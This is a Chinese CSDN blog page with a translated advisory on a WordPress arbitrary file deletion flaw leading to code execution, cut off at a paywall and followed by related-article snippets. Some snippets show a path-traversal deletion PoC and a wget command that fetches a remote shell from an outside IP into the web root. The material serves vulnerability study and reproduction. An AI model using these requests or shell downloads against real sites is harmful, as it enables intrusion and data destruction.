WordPress 漏洞详情:从任意文件删除到任意代码执行

最新推荐文章于 2022-09-12 11:53:47 发布
最新推荐文章于 2022-09-12 11:53:47 发布
阅读量415 收藏
点赞数 1
分类专栏: 爱内涵易语言分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57003296/article/details/115497246
版权
本文揭示了WordPress CMS中的一个严重漏洞,允许攻击者执行任意代码。该漏洞涉及未过滤的用户输入导致任意文件删除,影响所有WordPress版本。攻击者需有编辑和删除媒体文件权限,可能导致WordPress安装破坏、执行任意代码。目前,官方尚未发布补丁,作者提供了临时补丁以供使用,建议用户尽快采取措施以增强安全性。
摘要由CSDN通过智能技术生成

    WordPress是网络上最受欢迎的CMS系统。据w3tech统计,约有30%的网站运行了该系统。该系统的应用是如此广泛,难免会成为网络犯罪分子攻击目标。在这篇博文中,我们将为读者介绍WordPress内核中的一个任意文件删除漏洞,这个漏洞可能会导致攻击者执行任意代码。早在7个月前,我们就向WordPress安全团队报告了这个漏洞,但到目前为止,该漏洞仍然没有得到修补。自初次报告(该报告既没有提供任何补丁,也没有给出具体的修复计划)至今,已经过了漫长的时间,但是仍然没有看到任何的修复迹象,所以,我们决定将这个漏洞公之于众,以督促其尽快采取行动。
    谁会受到该漏洞的影响
    在撰写本文时,该漏洞仍然没有补丁可用。并且,所有WordPress版本,包括当前的4.9.6版本在内,都面临这个漏洞的威胁。
    要想利用下面讨论的这个漏洞,攻击者需要事先获得编辑和删除媒体文件的权限。因此,该漏洞可用于通过接管角色与作者一样低的帐户或通过利用其他漏洞/错误配置来实现提权。
    危害:攻击者能够利用它做什么
    利用这个漏洞,攻击者能够删除WordPress安装的任何文件(+PHP服务器上的任何其他文件,即PHP进程有权删除的,尽情删就是了)。除了删除整个WordPress安装的可能性(如果当前没有备份可用的话,将会导致灾难性后果)之外,攻击者还可以利用任意文件删除功能绕过一些安全措施,继而在Web服务器上执行任意代码。更确切地说,攻击者可以删除下列文件:
    .htaccess:通常情况下,删除该文件不会有任何安全影响。但是,在某些情况下&

最低0.47元/天 解锁文章
qq_57003296
关注
专栏目录
Wordpress4.9.6 任意文件删除漏洞复现分析
微赚淘客系统开发者博客
01-27 1141
第一章 漏洞简介及危害分析 1.1漏洞介绍 WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大,源代码可以在这里找到。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标...
wordpresss任意文件删除漏洞复现
xy_sugar的博客
03-19 782
环境搭建(phpstudy) ​ 进入后台后,点击Media(媒体),在点击Add New (添加) ​ 进入到上传文件位置 ​ 选择一张图片上传然后点击编辑,页面跳转到如下图所示​ 然后用插件查找post.php,找到_wpnonce的值为d6c958e911 用hackbar对数据包进行修改 然后在burpsuite里面重放,发送成功返回302状态 此时在...
php任意文件删除漏洞,WordPress任意文件删除漏洞修复方法
weixin_39613839的博客
04-02 298
RIPS团队公开了wordpress 4.9.6以及4.9.6之前版本存在的任意文件删除漏洞,通过该漏洞,具有登录上传附件权限的用户可以删除网站上任意文件,该漏洞在4.9.7版本被修复,如果正在使用wordpress 4.9.7以下版本的用户可以更新到最新版本修复该漏洞,不想更新的站长可以通过下面的方法修复。漏洞原理与危害由于WordPress文件wp-includes/post.php中的函数...
6-PHP代码审计——wordpress任意文件删除
网络安全
04-07 492
本次漏洞实验是利用wordpress4.9的漏洞删除任意文件111.txt。 漏洞环境:wordpress4.9 漏洞环境的poc action=editattachment&_wpnonce=7aeafc1fe9&post_ID=12&thumb=../../../../111.txt /wp-admin/post.php?post=12&action=delete&_wpnonce=808be5ed4b 访问http://www.t...
关于 WordPress 任意文件删除漏洞安全预警通知
360°网站管家
07-03 339
漏洞详情】   WordPress 的 unlink() 函数处理的用户输入传递给文件删除功能时,会产生任意文件删除漏洞。【风险等级】   高风险【漏洞风险】   任意文件删除【影响版本】   目前已知受影响版本如下:   全系列 WordPress,包括当前的 4.9.6 版本。【修复建议】   目前 WordPress 官方并未发布最新更新补丁,漏洞研究人员发布了临时加固措施,请用户根据自身...
wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析1
08-03
WordPress wpDiscuz 评论插件任意文件上传漏洞分析】 WordPress 是一款广泛使用的开源内容管理系统,而 wpDiscuz 是一个流行的评论插件,它为 WordPress 网站提供了丰富的交互式评论功能。然而,如同任何软件一样...
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装
最新发布
01-01
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装包wordpress-5.4.1-zh_CN.tar.gz,phpStudy_64_v8.1.1.3.zip,phpStudy-1_v8.1.0.3.zip,wpdiscuz.7.0.4-1670423032410.zip
wordpress漏洞上传php文件,WordPress任意文件上传漏洞
weixin_30978239的博客
03-09 726
WordPress是一款免费的论坛Blog系统。WordPress中负责上传文件代码如下:漏洞文件:'wp-admin/includes/file.php'Bugtraq ID: 37005Class: Input Validation ErrorCVE:Remote: YesLocal: NoPublished: Nov 11 2009 12:00AMUpdated: Nov 12...
WordPress安全漏洞:从任意文件删除任意代码执行
jisuyunzzc的博客
05-29 503
WordPress安全漏洞:从任意文件删除任意代码执行 WordPress是网络上最受欢迎的CMS系统。据w3tech统计,约有30%的网站运行了该系统。该系统的应用是如此广泛,难免会成为网络犯罪分子攻击目标。在这篇博文中,我们将为读者介绍WordPress内核中的一个任意文件删除漏洞,这个漏洞可能会导致攻击者执行任意代码。早在7个月前,我们就向WordPress安全团队报告了这个漏洞,但到目前为止,该漏洞仍然没有得到修补。自初次报告(该报告既没有提供任何补丁,也没有给出具体的修复计划)至今,已经过了漫长
wpincludes media.php,WP_Image_Editor_Imagick 指令注入漏洞修复方法
weixin_31448343的博客
03-19 83
Imagick组件爆出了超级漏洞,危害等级极高,直接导致大量使用Imagick组件的网站均存在漏洞WordPress自然也要中招,为了防止WP_Image_Editor_Imagick扩展的指令注入风险,将wordpress的默认图片处理库优先顺序改为GD优先,可在/wp-includes/media.php的_wp_image_editor_choose()函数中找到需修改的部分。具体修复如下...
WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析
abg49988的博客
04-20 833
漏洞信息 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址...
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1059
简单了解cms,复现vulhub中的wordpress漏洞
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
daxi0ng的博客
09-25 2004
0x00 简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案! 0x01 漏洞概述 安全人员进行调查时,很快发现WordPress插件.
Wordpress漏洞复现
weixin_52194536的博客
09-10 9113
cms漏洞
WordPress依然是最遭受黑客攻击的CMS平台
weixin_33964094的博客
07-03 116
Sucuri公布了2016年第2季度被黑网站报告,再次指出在全球范围内WordPress是黑客最喜欢攻击的平台。最新季度报告基本上同今年第1季度相同,调查数据显示将近四分之三(74%)的攻击目标都集中在WordPress上,这和它在内容管理系统(CMS)上拥有50%以上市场是密不可分。 其他CMS平台上容易收到攻击的排行分别为 Joomla (...
CMS漏洞wordpress01
zh的博客
10-15 869
靶场地址:http://whalwl.site:8041/ 解题准备:准备POC 解题思路: 1、抓包,准备修改数据包 执行命令,远程下载一个shell,到靶场网站根目录。 /usr/bin/wget --output-document /var/www/html/999.php 167.160.xxx.217/999.txt 2、具体请求包: POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -fr...
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
Wordpress插件漏洞演示:实战攻防与安全检测
- **CompleteGalleryManager 3.3.3任意文件上传漏洞**:这个插件的一个版本存在上传漏洞,允许攻击者上传恶意文件到服务器。 4. **WordPress插件注入漏洞**:课程还提及了一个具体的插件注入漏洞(Exploit-DB编号...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值